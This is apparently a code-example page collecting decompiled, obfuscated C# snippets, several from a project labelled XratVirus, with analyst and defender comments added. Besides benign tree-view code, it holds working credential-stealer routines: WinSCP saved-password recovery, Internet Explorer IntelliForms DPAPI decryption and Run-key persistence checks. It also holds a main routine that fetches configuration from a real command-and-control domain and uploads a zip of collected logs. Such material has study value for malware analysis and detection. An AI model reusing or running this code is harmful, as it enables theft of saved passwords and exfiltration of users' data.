コード例 #1
ファイル: Root.cs プロジェクト: seebog/RDODecrypt
 // Token: 0x060001A5 RID: 421 RVA: 0x00018C38 File Offset: 0x00016E38
 /// <summary>
 /// Adds top-level nodes to <paramref name="treeview"/> for each entry in <c>this.Nodes</c>,
 /// dispatching on the entry's exact runtime type.
 /// </summary>
 /// <param name="treeview">Tree view that receives the generated nodes.</param>
 public void PopulateTree(TreeView treeview)
 {
     // Leave the control untouched when nothing is stored.
     if (this.Nodes == null || this.Nodes.Count == 0)
     {
         return;
     }

     treeview.BeginUpdate();
     for (int index = 0; index < this.Nodes.Count; index++)
     {
         object entry = this.Nodes[index];

         // Exact type comparison: instances of derived types are not matched by any branch.
         if (entry.GetType() == typeof(IdCards))
         {
             treeview.Nodes.Add(new GClass10((IdCards)entry));
         }
         else if (entry.GetType() == typeof(Connections))
         {
             treeview.Nodes.Add(new GClass9((Connections)entry));
         }
         else if (entry.GetType() == typeof(Folder))
         {
             // An empty GClass10 node is added ahead of the folder's content.
             treeview.Nodes.Add(new GClass10());

             // The folder's children are copied under a fresh GClass9 node,
             // which is then added as a top-level node.
             TreeNode folderNode = new FolderTreeNode((Folder)entry);
             GClass9 container = new GClass9();
             foreach (object child in folderNode.Nodes)
             {
                 container.Nodes.Add((TreeNode)child);
             }
             treeview.Nodes.Add(container);
         }
     }
     treeview.EndUpdate();
 }
コード例 #2
ファイル: Firefox.cs プロジェクト: StartZYP/XratVirus
 // Token: 0x06000460 RID: 1120 RVA: 0x00010578 File Offset: 0x0000E778
 // Resolves the Firefox installation directory from the machine-wide Mozilla registry key,
 // stores it in Firefox.firefoxPath and returns it. Returns null when the key cannot be opened.
 // Throws IndexOutOfRangeException when the key has no subkeys and NullReferenceException
 // when the "Install Directory" value is null or empty.
 // GClass8, GClass9 and the smethod_* calls are obfuscated helpers defined elsewhere; their
 // behaviour is inferred from how they are used here - confirm against their definitions.
 // Analyst note: this page attributes the file to a project named XratVirus, so the lookup is
 // presumably a first step toward reading Firefox's stored data. A process other than the
 // browser or its updater reading this key is a weak but useful hunting signal.
 private static DirectoryInfo GetFirefoxInstallPath()
 {
     // When GClass8.Is64Bit is true the Wow6432Node path is used, otherwise the native path.
     using (RegistryKey registryKey = GClass8.Is64Bit ? GClass9.smethod_1(RegistryHive.LocalMachine, "SOFTWARE\\Wow6432Node\\Mozilla\\Mozilla Firefox") : GClass9.smethod_1(RegistryHive.LocalMachine, "SOFTWARE\\Mozilla\\Mozilla Firefox"))
     {
         if (registryKey == null)
         {
             return(null);
         }
         string[] subKeyNames = registryKey.GetSubKeyNames();
         if (subKeyNames.Length == 0)
         {
             throw new IndexOutOfRangeException("No installs of firefox recorded in its key.");
         }
         // Only the first subkey is examined; any further subkeys are ignored.
         // NOTE(review): OpenSubKey can return null and the result is used without a check.
         using (RegistryKey registryKey2 = registryKey.OpenSubKey(subKeyNames[0]))
         {
             // presumably opens the "Main" subkey and reads "Install Directory" with "" as default - verify the helpers
             string text = registryKey2.smethod_2("Main").smethod_1("Install Directory", "");
             if (string.IsNullOrEmpty(text))
             {
                 throw new NullReferenceException("Install string was null or empty");
             }
             Firefox.firefoxPath = new DirectoryInfo(text);
         }
     }
     return(Firefox.firefoxPath);
 }
コード例 #3
 // Token: 0x0600033E RID: 830 RVA: 0x00013404 File Offset: 0x00011604
 // Builds the form: subscribes the Load handler, creates the GClass12 member, calls
 // InitializeComponent, then stores the two supplied objects.
 // Both parameters are declared ref but are only read here, never reassigned.
 // GClass8, GClass9 and GClass12 are obfuscated names; what they represent is not visible in this snippet.
 public PixieForm(ref GClass8 gclass8_1, ref GClass9 gclass9_1)
 {
     base.Load      += this.PixieForm_Load;
     // Constructed with an empty string and the GEnum5.Manual member; the meaning of both is defined by GClass12.
     this.gclass12_0 = new GClass12("", GClass12.GEnum5.Manual);
     this.InitializeComponent();
     // Stored only after InitializeComponent has run.
     this.gclass9_0 = gclass9_1;
     this.GClass8_0 = gclass8_1;
 }
コード例 #4
 // Token: 0x0600007D RID: 125 RVA: 0x00006330 File Offset: 0x00004530
 // Returns the boolean result of GClass9.smethod_2 for the name GClass35.string_7 under registry
 // autostart paths. When GClass3.smethod_1() returns "Admin", the HKLM path supplied by
 // GClass16.smethod_0() is tried first and the per-user Run key second (short-circuit OR);
 // otherwise only the per-user Run key is used.
 // GClass9.smethod_2(hive, path, name) is an obfuscated helper: whether it tests for, creates or
 // removes the value cannot be told from this snippet - confirm in GClass9.
 // Defender note: values under ...\CurrentVersion\Run are launched at user logon, which makes this
 // key a common persistence location (MITRE ATT&CK T1547.001). Changes to Run keys in both hives
 // are worth auditing.
 public static bool smethod_2()
 {
     if (GClass3.smethod_1() == "Admin")
     {
         return(GClass9.smethod_2(RegistryHive.LocalMachine, GClass16.smethod_0(), GClass35.string_7) || GClass9.smethod_2(RegistryHive.CurrentUser, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", GClass35.string_7));
     }
     return(GClass9.smethod_2(RegistryHive.CurrentUser, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", GClass35.string_7));
 }
コード例 #5
    /// <summary>
    /// Packs the three strings into a new <c>GClass9</c> and hands it to <c>method_1</c>.
    /// </summary>
    /// <remarks>
    /// The arguments are stored in reverse order: <paramref name="string_2"/> goes to String_0,
    /// <paramref name="string_1"/> to String_1 and <paramref name="string_0"/> to String_2.
    /// </remarks>
    public void method_0(string string_0, string string_1, string string_2)
    {
        GClass9 message = new GClass9();
        message.set_String_0(string_2);
        message.set_String_1(string_1);
        message.set_String_2(string_0);

        this.method_1(message);
    }
コード例 #6
    /// <summary>
    /// Serializes <paramref name="gclass9_0"/> to JSON and sends it to <c>this.uri_0</c> as a
    /// form POST with a single field named "payload".
    /// </summary>
    /// <remarks>
    /// The response body is decoded with <c>this.encoding_0</c> but the text is discarded.
    /// NOTE(review): the scheme of <c>this.uri_0</c> is not visible here; confirm it is HTTPS
    /// before treating the transfer as protected in transit.
    /// </remarks>
    public void method_1(GClass9 gclass9_0)
    {
        // Serialization happens before any network object is created.
        string json = JsonConvert.SerializeObject(gclass9_0);

        using (WebClient http = new WebClient())
        {
            NameValueCollection form = new NameValueCollection();
            form["payload"] = json;

            byte[] responseBody = http.UploadValues(this.uri_0, "POST", form);

            // The decoded text is unused; the call is kept so decoding still runs on the response.
            this.encoding_0.GetString(responseBody);
        }
    }
コード例 #7
    // Token: 0x060001D6 RID: 470 RVA: 0x0000C668 File Offset: 0x0000A868
    // Enumerates the current user's saved WinSCP sessions in the registry and returns one GClass32
    // record per session that has a non-empty HostName: URL as "host:port", user name, password
    // text and Application = "WinSCP". Any exception is swallowed and whatever was collected up to
    // that point is returned.
    // GClass9.smethod_1 and the RegistryKey smethod_1/smethod_2 calls are obfuscated helpers
    // (apparently "open key", "read value with default" and "open subkey") - confirm their definitions.
    // Defender note: WinSCP keeps saved session settings, including stored passwords, under this
    // key. GClass22.smethod_2 receives user name, stored value and host name and is presumably the
    // routine that reverses WinSCP's stored-password encoding - confirm in GClass22. Setting a
    // WinSCP master password, or not saving passwords, limits what this kind of code can recover,
    // and reads of this key by processes other than WinSCP are worth alerting on.
    public static List <GClass32> smethod_0()
    {
        List <GClass32> list = new List <GClass32>();
        List <GClass32> result;

        try
        {
            // NOTE(review): as written, the literal yields doubled backslashes between path segments;
            // this may be a decompiler or scraping artifact - verify against the binary.
            string path = "SOFTWARE\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions";
            // registryKey is not null-checked; a null here would throw and be absorbed by the catch below.
            using (RegistryKey registryKey = GClass9.smethod_1(RegistryHive.CurrentUser, path))
            {
                // One subkey per saved session.
                foreach (string name in registryKey.GetSubKeyNames())
                {
                    using (RegistryKey registryKey2 = registryKey.smethod_2(name))
                    {
                        if (registryKey2 != null)
                        {
                            string text = registryKey2.smethod_1("HostName", "");
                            // Sessions without a host name are skipped.
                            if (!string.IsNullOrEmpty(text))
                            {
                                string text2 = registryKey2.smethod_1("UserName", "");
                                string text3 = GClass22.smethod_2(text2, registryKey2.smethod_1("Password", ""), text);
                                string text4 = registryKey2.smethod_1("PublicKeyFile", "");
                                // "22" is used when the session stores no PortNumber value.
                                text = text + ":" + registryKey2.smethod_1("PortNumber", "22");
                                // With no recovered password but a key file configured, the key file's
                                // path is recorded in the password field; the key itself is not read here.
                                if (string.IsNullOrEmpty(text3) && !string.IsNullOrEmpty(text4))
                                {
                                    text3 = string.Format("[PRIVATE KEY LOCATION: \"{0}\"]", Uri.UnescapeDataString(text4));
                                }
                                list.Add(new GClass32
                                {
                                    URL         = text,
                                    Username    = text2,
                                    Password    = text3,
                                    Application = "WinSCP"
                                });
                            }
                        }
                    }
                }
            }
            result = list;
        }
        catch
        {
            // Bare catch: every failure is hidden and the partial list is returned.
            result = list;
        }
        return(result);
    }
コード例 #8
        // Token: 0x060004F4 RID: 1268 RVA: 0x00012528 File Offset: 0x00010728
        /// <summary>
        /// Reports whether the current user's IntelliForms\Storage2 registry key contains a value
        /// whose name equals <paramref name="urlHash"/>.
        /// </summary>
        /// <param name="urlHash">Value name to look for.</param>
        /// <returns>
        /// <c>true</c> when a value with that exact name exists; <c>false</c> when it does not or
        /// when the key could not be opened.
        /// </returns>
        private static bool DoesURLMatchWithHash(string urlHash)
        {
            using (RegistryKey storageKey = GClass9.smethod_1(RegistryHive.CurrentUser, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2"))
            {
                if (storageKey == null)
                {
                    return false;
                }

                // Ordinal, case-sensitive comparison against every value name under the key.
                foreach (string valueName in storageKey.GetValueNames())
                {
                    if (valueName == urlHash)
                    {
                        return true;
                    }
                }
                return false;
            }
        }
コード例 #9
ファイル: Connections.cs プロジェクト: seebog/RDODecrypt
 // Token: 0x06000199 RID: 409 RVA: 0x00018444 File Offset: 0x00016644
 /// <summary>
 /// Builds the <c>Nodes</c> list from the children of <paramref name="node"/>: folder tree nodes
 /// become <c>Folder</c> objects and remote-desktop tree nodes contribute their
 /// <c>RemoteDesktopInfo</c>.
 /// </summary>
 /// <param name="node">Tree node whose direct children are converted.</param>
 public Connections(GClass9 node)
 {
     var children = node.Nodes;
     this.Nodes = new ArrayList(children.Count);

     for (int position = 0; position < children.Count; position++)
     {
         var child = children[position];

         // Exact type comparison: derived node types are not matched.
         if (child.GetType() == typeof(FolderTreeNode))
         {
             this.Nodes.Insert(position, new Folder((FolderTreeNode)child));
             continue;
         }

         if (child.GetType() == typeof(RemoteDesktopTreeNode))
         {
             this.Nodes.Insert(position, ((RemoteDesktopTreeNode)child).RemoteDesktopInfo);
         }

         // Each item is inserted at its child's own index, so a child of any other type leaves a
         // gap and the next Insert would be past the end of the list.
     }
 }
コード例 #10
 // Token: 0x0600034A RID: 842 RVA: 0x010385D4 File Offset: 0x010367D4
 // Reads the PE headers of a module in another process and returns the AddressOfEntryPoint field
 // of its optional header, or 0 when the headers cannot be read or do not validate.
 // intptr_7 is the process handle and intptr_8 the module handle (the exception messages name
 // them hProcess and hModule). Throws ArgumentException for an invalid handle.
 // GClass5.smethod_4(process, address, size) presumably returns that many bytes read from the
 // target process, or null on failure; GStruct6 and GStruct9 presumably mirror the DOS header and
 // the NT headers - confirm in their definitions.
 // Analyst note: locating a remote module's entry point is done by debuggers and loaders, and also
 // by code that tampers with other processes; the callers decide which applies here.
 private static uint smethod_2(IntPtr intptr_7, IntPtr intptr_8)
 {
     // presumably rejects a zero handle and the -1 pseudo-handle - verify the IntPtr helpers
     if (intptr_7.smethod_4() || intptr_7.smethod_2(-1L))
     {
         throw new ArgumentException("Invalid process handle.", "hProcess");
     }
     if (intptr_8.smethod_4())
     {
         throw new ArgumentException("Invalid module handle.", "hModule");
     }
     byte[] array = GClass5.smethod_4(intptr_7, intptr_8, (uint)Marshal.SizeOf(typeof(GStruct6)));
     if (array != null)
     {
         // Offset 0 holds the DOS signature, offset 60 (0x3C) the file offset of the NT headers.
         ushort num  = BitConverter.ToUInt16(array, 0);
         uint   num2 = BitConverter.ToUInt32(array, 60);
         // 23117 == 0x5A4D, the "MZ" signature.
         if (num == 23117)
         {
             byte[] array2 = GClass5.smethod_4(intptr_7, intptr_8.smethod_0((long)((ulong)num2)), (uint)Marshal.SizeOf(typeof(GStruct9)));
             // 17744 == 0x4550, the "PE\0\0" signature.
             if (array2 != null && BitConverter.ToUInt32(array2, 0) == 17744u)
             {
                 GStruct9 gstruct = default(GStruct9);
                 uint     addressOfEntryPoint;
                 // presumably a 256-byte scratch buffer used to convert the bytes into the struct - confirm in GClass9
                 using (GClass9 gclass = new GClass9(256))
                 {
                     if (!gclass.method_9 <GStruct9>(array2, out gstruct))
                     {
                         return(0u);
                     }
                     addressOfEntryPoint = gstruct.OptionalHeader.AddressOfEntryPoint;
                 }
                 return(addressOfEntryPoint);
             }
         }
     }
     return(0u);
 }
コード例 #11
        // Token: 0x06000131 RID: 305 RVA: 0x0000A8D0 File Offset: 0x00008AD0
        // Entry point of the sample. Flow visible in this method:
        //   1. Runs three Class9 start-up helpers (purpose not visible here).
        //   2. Derives a URL from two embedded, encoded constants via Class8/Class11 helpers.
        //   3. Fetches a comma-separated configuration from that URL and maps fields 0-12 to flags.
        //   4. Runs the routines enabled by those flags, then a fixed set of routines.
        //   5. Passes the URL and "<GClass9.string_0>\<Class23.string_0>.zip" to Class27.smethod_1
        //      (presumably an upload), then deletes the directory GClass9.string_6.
        // All ClassNN/smethod_N names are obfuscated; what each routine does must be confirmed in
        // its own definition.
        // Analyst notes: behaviour is driven entirely by the remote configuration, so the same
        // binary can act differently per fetch. The configuration is indexed without a length
        // check, so a response with fewer than 13 fields throws IndexOutOfRangeException.
        private static void Main(string[] args)
        {
            Class9.smethod_0();
            Class9.smethod_1();
            Class9.smethod_2();
            string string_ = "ʰʷˉ˞˜ʷ˩˾ʰ˼ʷʰ˞ˉ˜ʷʰʷʷ˼ʰʷ˜ʰʷ˜ʰ˒ʷ˜ʰʰʰʨʷʰʷʰʷʰʨʷʰʷʰ˿˜˾˩˼ˣ˯˳˃˞˜ˏ˓˃˯˳˼ˣʩʩʩʷʷʷʷ";

            // The hex text reads http://gamefpsbuster[.]ru when decoded as ASCII (defanged here).
            // It is passed as the second argument of Class11.smethod_0, presumably as key material - confirm.
            byte[] byte_   = Class8.smethod_0("687474703a2f2f67616d656670736275737465722e7275");
            byte[] bytes   = Encoding.Default.GetBytes(Class11.smethod_2(string_));
            string @string = Encoding.Default.GetString(Class11.smethod_0(bytes, byte_));

            // The first decoding result is itself used as the second argument of the next pass.
            byte[] bytes2 = Encoding.Default.GetBytes(@string);
            GClass9.smethod_0();
            Class23.smethod_5(Class23.string_0);
            GClass9.smethod_1();
            // Fetches the configuration from the decoded URL. The response and reader are never disposed.
            string[] array = new StreamReader(WebRequest.Create(Encoding.Default.GetString(Class11.smethod_0(bytes, bytes2))).GetResponse().GetResponseStream()).ReadToEnd().Split(new char[]
            {
                ','
            });
            bool flag   = false;
            bool flag2  = false;
            bool flag3  = false;
            bool flag4  = false;
            bool flag5  = false;
            bool flag6  = false;
            bool flag7  = false;
            bool flag8  = false;
            bool flag9  = false;
            bool flag10 = false;
            bool flag11 = false;

            // Field 12 is evaluated first: unless it is "1", Class12.smethod_5 runs before anything else.
            if (array[12] == "1")
            {
                flag8 = true;
            }
            if (!flag8)
            {
                Class12.smethod_5();
            }
            if (array[0] == "1")
            {
                flag = true;
            }
            if (array[1] == "1")
            {
                flag4 = true;
            }
            if (array[2] == "1")
            {
                flag5 = true;
            }
            if (array[3] == "1")
            {
                flag11 = true;
            }
            if (array[4] == "1")
            {
                flag2 = true;
            }
            if (array[5] == "1")
            {
                flag6 = true;
            }
            if (array[6] == "1")
            {
                flag10 = true;
            }
            if (array[7] == "1")
            {
                flag3 = true;
            }
            if (array[10] == "1")
            {
                flag9 = true;
            }
            // Field 11 is not a 0/1 switch: it is used when it starts with "http".
            if (array[11].StartsWith("http"))
            {
                flag7 = true;
            }
            // A server-supplied URL and its file name are handed to Class20.smethod_0, presumably a
            // download of an additional file - confirm in Class20.
            if (flag7)
            {
                string text     = array[11];
                string fileName = Path.GetFileName(text);
                Class20.smethod_0(text, fileName);
            }
            if (flag)
            {
                Class13.smethod_3();
                Class21.smethod_0();
            }
            if (flag5)
            {
                Class18.smethod_0();
            }
            // Same call as above with the same arguments; the routine therefore runs twice when field 11 is set.
            if (flag7)
            {
                string text2     = array[11];
                string fileName2 = Path.GetFileName(text2);
                Class20.smethod_0(text2, fileName2);
            }
            if (flag2)
            {
                Class17.smethod_10();
            }
            if (flag6)
            {
                Class17.smethod_6();
            }
            if (flag4)
            {
                Class15.smethod_0();
                Class13.smethod_2();
                Class25.smethod_9();
            }
            if (flag11)
            {
                Class17.smethod_5(GClass9.string_2);
            }
            if (flag3)
            {
                // Field 8 is a ':'-separated list and field 9 an integer multiplied by 1024;
                // presumably a filter list and a size limit in KiB - confirm in Class17.
                foreach (string item in array[8].Split(new char[]
                {
                    ':'
                }))
                {
                    Class17.list_0.Add(item);
                }
                Class17.int_0  = Convert.ToInt32(array[9]);
                Class17.int_0 *= 1024;
                Class17.smethod_8();
            }
            if (flag10)
            {
                Class17.smethod_9();
            }
            // The routines below run regardless of the configuration.
            Class17.smethod_11();
            Class17.smethod_7();
            Class23.smethod_0();
            Class12.smethod_11();
            Class12.smethod_9();
            Class12.smethod_10();
            Class23.smethod_1();
            Class12.smethod_6();
            string string_2 = GClass9.string_0 + "\\" + Class23.string_0 + ".zip";

            try
            {
                Class27.smethod_0();
                // Receives the decoded URL, the zip path, the strings "logs" and "zip" and a name/value collection.
                Class27.smethod_1(Encoding.Default.GetString(Class11.smethod_0(bytes, bytes2)), string_2, "logs", "zip", Class27.nameValueCollection_0);
            }
            catch
            {
                // Empty catch: any failure in the two calls above is silently ignored.
            }
            if (flag9)
            {
                Class12.smethod_7();
            }
            Class12.smethod_8();
            // Single-argument Directory.Delete removes only an empty directory and throws otherwise.
            Directory.Delete(GClass9.string_6);
        }
コード例 #12
        // Token: 0x060004F3 RID: 1267 RVA: 0x00012310 File Offset: 0x00010510
        // Decrypts the Internet Explorer IntelliForms blob stored for `url` and fills dataList with
        // string[3] items: [0] and [1] are the two decoded strings of one secret pair, [2] is the
        // URL hash. Returns false when no registry value name matches the URL hash or the key cannot
        // be opened. Otherwise returns true, even when the size check fails and nothing is added.
        // Defender note: the blob is unprotected with DPAPI in CurrentUser scope using the URL as
        // additional entropy, so any code running as that user and knowing the URL can recover
        // these entries. Reads of IntelliForms\Storage2 by processes other than the browser are
        // worth alerting on.
        private static bool DecryptIePassword(string url, List <string[]> dataList)
        {
            string urlhashString = InternetExplorer.GetURLHashString(url);

            if (!InternetExplorer.DoesURLMatchWithHash(urlhashString))
            {
                return(false);
            }
            byte[] encryptedData;
            using (RegistryKey registryKey = GClass9.smethod_1(RegistryHive.CurrentUser, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2"))
            {
                if (registryKey == null)
                {
                    return(false);
                }
                // The value is named after the URL hash. The cast assumes a binary value.
                encryptedData = (byte[])registryKey.GetValue(urlhashString);
            }
            // Entropy buffer: the URL's UTF-16 code units followed by two zero bytes (a null terminator).
            byte[] array = new byte[2 * (url.Length + 1)];
            Buffer.BlockCopy(url.ToCharArray(), 0, array, 0, url.Length * 2);
            byte[] array2 = ProtectedData.Unprotect(encryptedData, array, DataProtectionScope.CurrentUser);
            InternetExplorer.IEAutoComplteSecretHeader ieautoComplteSecretHeader = InternetExplorer.ByteArrayToStructure <InternetExplorer.IEAutoComplteSecretHeader>(array2);
            // Only the total length is validated: header size + secret-info size + secret size must fit in the blob.
            if ((long)array2.Length >= (long)((ulong)(ieautoComplteSecretHeader.dwSize + ieautoComplteSecretHeader.dwSecretInfoSize + ieautoComplteSecretHeader.dwSecretSize)))
            {
                // Entries are consumed two at a time, so the loop runs dwTotalSecrets / 2 times.
                uint   num    = ieautoComplteSecretHeader.IESecretHeader.dwTotalSecrets / 2U;
                int    num2   = Marshal.SizeOf(typeof(InternetExplorer.SecretEntry));
                // array3 receives the secret-data region that follows the header and secret-info regions.
                byte[] array3 = new byte[ieautoComplteSecretHeader.dwSecretSize];
                int    num3   = (int)(ieautoComplteSecretHeader.dwSize + ieautoComplteSecretHeader.dwSecretInfoSize);
                Buffer.BlockCopy(array2, num3, array3, 0, array3.Length);
                // NOTE(review): dataList is not a ref parameter, so a list created here for a null
                // argument is never visible to the caller.
                if (dataList == null)
                {
                    dataList = new List <string[]>();
                }
                else
                {
                    dataList.Clear();
                }
                // num3 is reused as the read position of the entry table, which starts right after the header struct.
                num3 = Marshal.SizeOf(ieautoComplteSecretHeader);
                int num4 = 0;
                while ((long)num4 < (long)((ulong)num))
                {
                    byte[] array4 = new byte[num2];
                    Buffer.BlockCopy(array2, num3, array4, 0, array4.Length);
                    InternetExplorer.SecretEntry secretEntry = InternetExplorer.ByteArrayToStructure <InternetExplorer.SecretEntry>(array4);
                    string[] array5 = new string[3];
                    // dwLength is multiplied by 2 for UTF-16 bytes. dwOffset and dwLength come from
                    // the blob and are not range-checked, so BlockCopy throws on out-of-range values.
                    byte[]   array6 = new byte[secretEntry.dwLength * 2U];
                    Buffer.BlockCopy(array3, (int)secretEntry.dwOffset, array6, 0, array6.Length);
                    array5[0] = Encoding.Unicode.GetString(array6);
                    num3     += num2;
                    // Second entry of the pair, decoded the same way.
                    Buffer.BlockCopy(array2, num3, array4, 0, array4.Length);
                    secretEntry = InternetExplorer.ByteArrayToStructure <InternetExplorer.SecretEntry>(array4);
                    byte[] array7 = new byte[secretEntry.dwLength * 2U];
                    Buffer.BlockCopy(array3, (int)secretEntry.dwOffset, array7, 0, array7.Length);
                    array5[1] = Encoding.Unicode.GetString(array7);
                    array5[2] = urlhashString;
                    dataList.Add(array5);
                    num3 += num2;
                    num4++;
                }
            }
            return(true);
        }